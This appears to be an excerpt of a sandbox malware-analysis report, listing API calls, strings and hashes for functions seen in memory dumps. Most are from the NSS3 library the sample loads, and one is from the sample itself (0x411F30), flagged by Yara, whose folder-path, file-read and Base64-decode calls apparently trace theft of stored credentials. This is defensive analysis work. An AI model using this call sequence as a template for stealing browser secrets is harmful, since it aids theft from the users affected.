_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C3EA69A

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3EA61D, 6C3EA68B, 6C3EA6B3
database corruption, xrefs: 6C3EA627
%s at line %d of [%.10s], xrefs: 6C3EA62C

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: 55d45bfd92b9eacdc4980b19f423e7fa6de4921cbf2f438ca4c9f30fd3b4c4dd
Instruction ID: 7fc5cbf8edd67dd121e3a04d88d5de5177feb421971966d83c235eb93ea6aede
Opcode Fuzzy Hash: 55d45bfd92b9eacdc4980b19f423e7fa6de4921cbf2f438ca4c9f30fd3b4c4dd
Instruction Fuzzy Hash: D45191B1908350ABDB01DF25D881E5A7FF1AF4931CF04886EF8898B651E736D994CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C38AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C38ADB1

Part of subcall function 6C36BE30: SECOID_FindOID_Util.NSS3(6C32311B,00000000,?,6C32311B,?), ref: 6C36BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C38ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C38AE08

Part of subcall function 6C36B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4418D0,?), ref: 6C36B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C38AE25
PL_FreeArenaPool.NSS3 ref: 6C38AE63
PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C38AE4D

Part of subcall function 6C294C70: TlsGetValue.KERNEL32(?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294C97
Part of subcall function 6C294C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CB0
Part of subcall function 6C294C70: PR_Unlock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C38AE93
PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C38AECC
PL_FreeArenaPool.NSS3 ref: 6C38AEDE
PL_FinishArenaPool.NSS3 ref: 6C38AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C38AEF5
PL_FinishArenaPool.NSS3 ref: 6C38AF16

Strings

security, xrefs: 6C38ADEE

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 7c1fcb18007498325e7382f0f8680fdfe4b54360176cac43879786ec16f8d446
Instruction ID: 913301087a6c8b65c174fc7cadb430813438a8e6b814332593a9d88283401de9
Opcode Fuzzy Hash: 7c1fcb18007498325e7382f0f8680fdfe4b54360176cac43879786ec16f8d446
Instruction Fuzzy Hash: CE412FB180621067EB319A159C45FAA33B89F4131CF140925E89496FC1FB3AA515CFF3

Uniqueness

Uniqueness Score: -1.00%

Function 6C324CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C324D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C324D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C324DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C324E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C324E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C324E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C324E85
DER_Encode_Util.NSS3(?,?,6C4705A4,00000000), ref: 6C324EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C324F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C324F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C324F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C324F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C324F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C324FC8

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: cc7a74f200e01314f9837fd7ec3d86b58d9f028e77d28f6c0ff2013cb35f8752
Instruction ID: d26c8f1aefe5f8962903d7a17b32aafae00132417d9f672a33ecb14fabc96f6f
Opcode Fuzzy Hash: cc7a74f200e01314f9837fd7ec3d86b58d9f028e77d28f6c0ff2013cb35f8752
Instruction Fuzzy Hash: 9A818171908301AFEB21CF25D840B5BB7E8ABC8758F14852DF998DB641E735E905CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C320470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C3204B7

Part of subcall function 6C370FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3187ED,00000800,6C30EF74,00000000), ref: 6C371000
Part of subcall function 6C370FF0: PR_NewLock.NSS3(?,00000800,6C30EF74,00000000), ref: 6C371016
Part of subcall function 6C370FF0: PL_InitArenaPool.NSS3(00000000,security,6C3187ED,00000008,?,00000800,6C30EF74,00000000), ref: 6C37102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C320539

Part of subcall function 6C371200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C371228
Part of subcall function 6C371200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C371238
Part of subcall function 6C371200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C37124B
Part of subcall function 6C371200: PR_CallOnce.NSS3(6C472AA4,6C3712D0,00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C37125D
Part of subcall function 6C371200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C37126F
Part of subcall function 6C371200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C371280
Part of subcall function 6C371200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C37128E
Part of subcall function 6C371200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C37129A
Part of subcall function 6C371200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C3712A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C32054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C32056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3205CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C3205EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C3205FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C320621
PR_EnterMonitor.NSS3 ref: 6C32063E
PR_ExitMonitor.NSS3 ref: 6C320668
CERT_DestroyCertificate.NSS3(?), ref: 6C320697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C3206AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C3206CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3206DA

Part of subcall function 6C31E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C3204DC,?,?), ref: 6C31E6C9
Part of subcall function 6C31E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C3204DC,?,?), ref: 6C31E6D9
Part of subcall function 6C31E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C3204DC,?,?), ref: 6C31E6F4
Part of subcall function 6C31E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C3204DC,?), ref: 6C31E703
Part of subcall function 6C31E6B0: CERT_FindCertIssuer.NSS3(?,?,6C3204DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C31E71E

Part of subcall function 6C31F660: PR_EnterMonitor.NSS3(6C32050F,?,00000001,?,?,?), ref: 6C31F6A8
Part of subcall function 6C31F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C31F6C1
Part of subcall function 6C31F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C31F7C8

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: 35c0379b0898d04d5c06af1f7b0af2dea1c5b12d7d1492389c30a2bf4cb86159
Instruction ID: 3816bb1a7c93ee261fae216d154a927212e965e7dab82069dc999e8a3edae90c
Opcode Fuzzy Hash: 35c0379b0898d04d5c06af1f7b0af2dea1c5b12d7d1492389c30a2bf4cb86159
Instruction Fuzzy Hash: 6361A071A083419FDF10DE28DC60F5B77A8EB84358F244528F99997A91E735E90CCFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C356C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C35781D,00000000,6C34BE2C,?,6C356B1D,?,?,?,?,00000000,00000000,6C35781D), ref: 6C356C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C35781D,?,6C34BE2C,?), ref: 6C356C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C35781D), ref: 6C356C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C356C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C356C96

Part of subcall function 6C301240: TlsGetValue.KERNEL32(00000040,?,6C30116C,NSPR_LOG_MODULES), ref: 6C301267
Part of subcall function 6C301240: EnterCriticalSection.KERNEL32(?,?,?,6C30116C,NSPR_LOG_MODULES), ref: 6C30127C
Part of subcall function 6C301240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C30116C,NSPR_LOG_MODULES), ref: 6C301291
Part of subcall function 6C301240: PR_Unlock.NSS3(?,?,?,?,6C30116C,NSPR_LOG_MODULES), ref: 6C3012A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C356CAA

Strings

dbm:, xrefs: 6C356C3A
dbm, xrefs: 6C356CA4
extern:, xrefs: 6C356C7E
rdb:, xrefs: 6C356C69
sql:, xrefs: 6C356C52
NSS_DEFAULT_DB_TYPE, xrefs: 6C356C91

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 5eecba7208827d291b3e2f4f7a4dbb03d04628634f56f2267be1b000c32e32ad
Instruction ID: 0168fa5853ec2eec053c45973c47af2e75a2394615db12f1ffff80d60290e10d
Opcode Fuzzy Hash: 5eecba7208827d291b3e2f4f7a4dbb03d04628634f56f2267be1b000c32e32ad
Instruction Fuzzy Hash: 2801F2E1B4239127FA00777A6E4AF26312C9F4115CF940035FE04E0A82EBAAE53445A5

Uniqueness

Uniqueness Score: -1.00%

Function 00411F30 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411F4E
memset.MSVCRT ref: 00411F65

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00411F9C
lstrcat.KERNEL32(?,04086790), ref: 00411FBB
lstrcat.KERNEL32(?,?), ref: 00411FCF
lstrcat.KERNEL32(?,04086508), ref: 00411FE3

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,04086388), ref: 0040971B
Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3

StrStrA.SHLWAPI(?,040866D0), ref: 0041209D
GlobalFree.KERNEL32(?), ref: 00412199

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0041212A
StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
lstrcat.KERNEL32(00000000,00000000), ref: 00412159
lstrcat.KERNEL32(00000000,?), ref: 0041216C
lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
String ID:
API String ID: 3662689742-0
Opcode ID: 36c557b0570699eea903d19c98cc913e6d9a782b508e14753a73fb5aa098a747
Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
Opcode Fuzzy Hash: 36c557b0570699eea903d19c98cc913e6d9a782b508e14753a73fb5aa098a747
Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6C30ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C30ACE2
malloc.MOZGLUE(00000001), ref: 6C30ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C30AD02
TlsGetValue.KERNEL32 ref: 6C30AD3C
calloc.MOZGLUE(00000001,?), ref: 6C30AD8C
PR_Unlock.NSS3 ref: 6C30ADC0
free.MOZGLUE(00000000), ref: 6C30AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C30AE58
free.MOZGLUE(00000000), ref: 6C30AE69
free.MOZGLUE(?), ref: 6C30AE78
PR_Unlock.NSS3 ref: 6C30AE8C
free.MOZGLUE(?), ref: 6C30AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C30AEC7

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 0e701a2be9db258a392480bb83d06cb0a9acb56f7d82696e9f5bbe5b23aeb583
Instruction ID: dcedc70a789bab18b972b7ac1d11a2b9fb83aa5c3937e54d22bf7955b1c6331c
Opcode Fuzzy Hash: 0e701a2be9db258a392480bb83d06cb0a9acb56f7d82696e9f5bbe5b23aeb583
Instruction Fuzzy Hash: D85190B2F012259BDF01FFA9E855AAE77B8BB06349F140125DC09A7B11D731A944CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C3E4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C3E4CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C3E4CFD
sqlite3_value_text16.NSS3(?), ref: 6C3E4D44

Strings

API call with %s database connection pointer, xrefs: 6C3E4CF6
bad parameter or other API misuse, xrefs: 6C3E4D05
unknown error, xrefs: 6C3E4D56
invalid, xrefs: 6C3E4CF1
another row available, xrefs: 6C3E4D20
out of memory, xrefs: 6C3E4C78, 6C3E4C9E
abort due to ROLLBACK, xrefs: 6C3E4D27, 6C3E4D33
no more rows available, xrefs: 6C3E4D2E

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: b12f803651b617c724109fdca0c79c8b1ea67598f210d7c51c09c445a244af79
Instruction ID: f768353469d90895160624a1ff9db89daa79e1929892a6187d6c687c869a73a8
Opcode Fuzzy Hash: b12f803651b617c724109fdca0c79c8b1ea67598f210d7c51c09c445a244af79
Instruction Fuzzy Hash: 59317CB3E04870B7E704A6A4A801FE6B375BB8E71CF554127D42547E15DB26BC128FE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C342CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C342CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C342D07

Part of subcall function 6C4209D0: PR_Now.NSS3 ref: 6C420A22
Part of subcall function 6C4209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C420A35
Part of subcall function 6C4209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C420A66
Part of subcall function 6C4209D0: PR_GetCurrentThread.NSS3 ref: 6C420A70
Part of subcall function 6C4209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C420A9D
Part of subcall function 6C4209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C420AC8
Part of subcall function 6C4209D0: PR_vsmprintf.NSS3(?,?), ref: 6C420AE8
Part of subcall function 6C4209D0: EnterCriticalSection.KERNEL32(?), ref: 6C420B19
Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C420B48
Part of subcall function 6C4209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C420C76
Part of subcall function 6C4209D0: PR_LogFlush.NSS3 ref: 6C420C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C342D22

Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(?), ref: 6C420B88
Part of subcall function 6C4209D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C420C5D
Part of subcall function 6C4209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C420C8D
Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420C9C
Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(?), ref: 6C420CD1
Part of subcall function 6C4209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C420CEC
Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420CFB
Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C420D16
Part of subcall function 6C4209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C420D26
Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420D35
Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C420D65
Part of subcall function 6C4209D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C420D70
Part of subcall function 6C4209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C420D90
Part of subcall function 6C4209D0: free.MOZGLUE(00000000), ref: 6C420D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C342D3B

Part of subcall function 6C4209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C420BAB
Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420BBA
Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C342D54

Part of subcall function 6C4209D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C420BCB
Part of subcall function 6C4209D0: EnterCriticalSection.KERNEL32(?), ref: 6C420BDE
Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(?), ref: 6C420C16

Strings

pLabel = 0x%p, xrefs: 6C342D4F
C_InitToken, xrefs: 6C342CE7
ulPinLen = %d, xrefs: 6C342D36
slotID = 0x%x, xrefs: 6C342D02
pPin = 0x%p, xrefs: 6C342D1D
nBl, xrefs: 6C342D6C, 6C342D9A

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
